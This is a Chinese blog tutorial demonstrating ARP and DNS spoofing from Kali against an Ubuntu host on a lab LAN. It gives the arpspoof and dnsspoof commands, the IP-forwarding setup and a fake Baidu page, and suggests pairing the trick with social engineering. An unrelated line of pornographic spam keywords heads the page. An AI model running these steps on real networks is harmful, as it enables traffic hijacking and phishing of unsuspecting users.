乡下人产国偷v产偷v自拍,国产午夜片在线观看,婷婷成人亚洲综合国产麻豆,久久综合给合久久狠狠狠9

  • <output id="e9wm2"></output>
    <s id="e9wm2"><nobr id="e9wm2"><ins id="e9wm2"></ins></nobr></s>

    • 分享

      DNS域名攻擊演示——“劫持”正常網(wǎng)頁(yè)實(shí)現(xiàn)惡意重定向

       copy_left 2020-01-27

      本文僅用于討論網(wǎng)絡(luò)安全技術(shù),以保護(hù)信息安全為目的,請(qǐng)勿用于非法用途!

      DNS域名攻擊演示——“劫持”正常網(wǎng)頁(yè)實(shí)現(xiàn)惡意重定向

      DNS域名解析服務(wù)

      DNS緩存攻擊原理

      除了ARP緩存攻擊,還可欺騙域名服務(wù)器(DNS)的緩存條目(從域名到IP地址的映射)。我們需要實(shí)現(xiàn)當(dāng)目標(biāo)訪問(wèn)某些特定網(wǎng)站時(shí),我們把這些流量轉(zhuǎn)發(fā)到一個(gè)被我們控制的站點(diǎn)。

      ARP解析協(xié)議處理的是IP和MAC地址之間的關(guān)系。

      DNS映射(解析)處理的是把www.xxx.com之類的域名解析到相應(yīng)的IP地址上。

      DNS域名攻擊演示——“劫持”正常網(wǎng)頁(yè)實(shí)現(xiàn)惡意重定向

      DNS解析原理

      總之,實(shí)際中我們?cè)谏暇W(wǎng)的時(shí)候,都是請(qǐng)求域名(比如www.baidu.com),然后域名在本地DNS緩存中尋找域名對(duì)應(yīng)的IP地址,如果找不到,就繼續(xù)去遠(yuǎn)程DNS服務(wù)器中尋找該域名的IP,一旦找到,也就完成了域名到IP訪問(wèn)的解析,實(shí)現(xiàn)了訪問(wèn)域名,其實(shí)就是訪問(wèn)域名與之綁定的IP。

      如下圖:

      顯示www.toutiao.com域名對(duì)應(yīng)的IP有很多(使用了CDN,不一定是服務(wù)器IP

      DNS域名攻擊演示——“劫持”正常網(wǎng)頁(yè)實(shí)現(xiàn)惡意重定向

      kali下nslookup查詢IP

      最終,用戶就可以在不需要知道確定IP的情況下通過(guò)URL實(shí)現(xiàn)網(wǎng)站的訪問(wèn)(大多數(shù)網(wǎng)站使用IP是無(wú)法訪問(wèn)的)

      入門(mén)(DNS緩存攻擊)

      DNS緩存攻擊就是使用主機(jī)發(fā)送一堆的DNS域名解析指向一個(gè)錯(cuò)誤ip(我們kali的IP),也就是說(shuō)讓他人訪問(wèn)www.baidu.com時(shí),本地DNS域名解析服務(wù)器將該域名指向我們的kali ip,那么他人自動(dòng)就會(huì)鏈接到我們的kali主機(jī)設(shè)置的冒牌baidu頁(yè)面。

      首先,要在kali上開(kāi)啟Apache2服務(wù):

      在kali終端下輸入:

      service apache2 start

      為什么要開(kāi)啟這個(gè)呢,我們要在這里kali的apache2服務(wù)器中放入我們的冒牌baidu網(wǎng)頁(yè)(你可以隨便去網(wǎng)上復(fù)制一個(gè),也可以自己制作一個(gè))

      在卡里的主目錄下,找到'其他位置',找到'計(jì)算機(jī)',然后在里面找到該路徑'usr/www/html'目錄(一定要參考視頻去找到?。?/p>

      將html目錄中的所有文件都刪掉!然后放置一份index.html(html超文本網(wǎng)頁(yè)代碼)的文件,該文件內(nèi)容如下:

      <!DOCTYPE html>

      <html>

      <head>

      <meta http-equiv='content-type' content='text/heml; charset=utf-8'>

      <title>關(guān)注今日頭條號(hào)——“駱訓(xùn)森”</title>

      <meta name='keywords' content='test'>

      <meta name='description' content='test website'>

      </head>

      <body>

      <h1>歡迎大家學(xué)習(xí)kali滲透測(cè)試課程!</h1>

      </body>

      <footer>

      <p>By 駱訓(xùn)森 原創(chuàng)制作</a>

      </footer>

      </html>

      DNS域名攻擊演示——“劫持”正常網(wǎng)頁(yè)實(shí)現(xiàn)惡意重定向

      需要這個(gè)index.html文件的,已經(jīng)放在會(huì)員群云盤(pán)共享文件夾中!需要可以關(guān)注我,然后私信我獲取即可!

      創(chuàng)建一個(gè)DNS域名解析的文件(我們隨便冒牌一個(gè)真實(shí)存在的域名網(wǎng)址www.baidu.com)

      在kali終端中輸入:

      echo 192.168.31.206 www.baidu.com > hosts.txt

      這里是將'192.168.31.206 www.baidu.com'寫(xiě)入文件hosts.txt中,如果hosts.txt不存在,就會(huì)自動(dòng)創(chuàng)建的!

      如下圖,首先往文件寫(xiě)入域名解析,然后使用cat查看是否寫(xiě)入成功!

      DNS域名攻擊演示——“劫持”正常網(wǎng)頁(yè)實(shí)現(xiàn)惡意重定向

      開(kāi)始DNS欺騙攻擊

      首先要在kali中開(kāi)啟路由轉(zhuǎn)發(fā):

      在kali的終端下輸入

      echo 1 > /proc/sys/net/ipv4/ip_forward

      開(kāi)啟目標(biāo)靶機(jī)(ubuntu)和網(wǎng)關(guān)之間的流量劫持:

      在kali終端下輸入

      arpspoof -i eth0 -t 192.168.31.178 192.168.31.1

      arpspoof -i eth0 -t 192.168.31.1 192.168.31.178

      接著使用dnsspoof工具進(jìn)行DNS欺騙

      在kali的終端下輸入

      dnsspoof -i eth0 -f hosts.txt

      DNS域名攻擊演示——“劫持”正常網(wǎng)頁(yè)實(shí)現(xiàn)惡意重定向

      上面以及開(kāi)啟了DNS欺騙攻擊,達(dá)到使目標(biāo)ubuntu訪問(wèn)www.baidu.com時(shí)出現(xiàn)我們?cè)O(shè)置的冒牌頁(yè)面的目的。

      先別急,先在ubuntu中ping下www.baidu.com域名的ip值

      發(fā)現(xiàn)了啥?www.baidu.com的ip怎么變成了kali的ip呢?這就表明ubuntu此時(shí)只要通過(guò)瀏覽器訪問(wèn)www.baidu.com這個(gè)網(wǎng)址,不會(huì)跳動(dòng)真正的baidu頁(yè)面,而是重定向到我們這臺(tái)惡意的服務(wù)器kali apache2中的var/www/html/中的index.html所展現(xiàn)的網(wǎng)頁(yè)頁(yè)面!

      DNS域名攻擊演示——“劫持”正常網(wǎng)頁(yè)實(shí)現(xiàn)惡意重定向

      重定向到我們的kali的ip

      我們來(lái)使用ubuntu的火狐瀏覽訪問(wèn)www.baidu.com網(wǎng)址驗(yàn)證下:

      仔細(xì)看看,明明訪問(wèn)的是www.baidu.com,可是這里顯示的是我kali自己配置的網(wǎng)頁(yè)!腦洞大開(kāi)!突然邪惡了下!要知道,實(shí)際應(yīng)用中并不用觸碰目標(biāo)主機(jī)?。壳皟H限局域網(wǎng)主機(jī))

      DNS域名攻擊演示——“劫持”正常網(wǎng)頁(yè)實(shí)現(xiàn)惡意重定向

      自動(dòng)訪問(wèn)到我們的kali web頁(yè)面

      這可不是真正的www.baidu.com主頁(yè)啊!

      到目前為止,我們已經(jīng)學(xué)會(huì)了使用DNS緩存欺騙攻擊!讓目標(biāo)主機(jī)訪問(wèn)的特定頁(yè)面重定向到我們kali的主機(jī)下,真是很好玩!另外這里我們可以選擇社工方法將你要他人打開(kāi)的連接,他人會(huì)以為是正常網(wǎng)頁(yè),每想到一打開(kāi)就會(huì)定向到你kali主機(jī)的虛假主頁(yè)中,其余的大家自行發(fā)揮吧!

      再次重申,請(qǐng)勿用于惡作劇和非法使用!否則后果自負(fù)!

        本站是提供個(gè)人知識(shí)管理的網(wǎng)絡(luò)存儲(chǔ)空間,所有內(nèi)容均由用戶發(fā)布,不代表本站觀點(diǎn)。請(qǐng)注意甄別內(nèi)容中的聯(lián)系方式、誘導(dǎo)購(gòu)買(mǎi)等信息,謹(jǐn)防詐騙。如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請(qǐng)點(diǎn)擊一鍵舉報(bào)。
        轉(zhuǎn)藏 分享 獻(xiàn)花(0

        0條評(píng)論

        發(fā)表

        請(qǐng)遵守用戶 評(píng)論公約

        類似文章 更多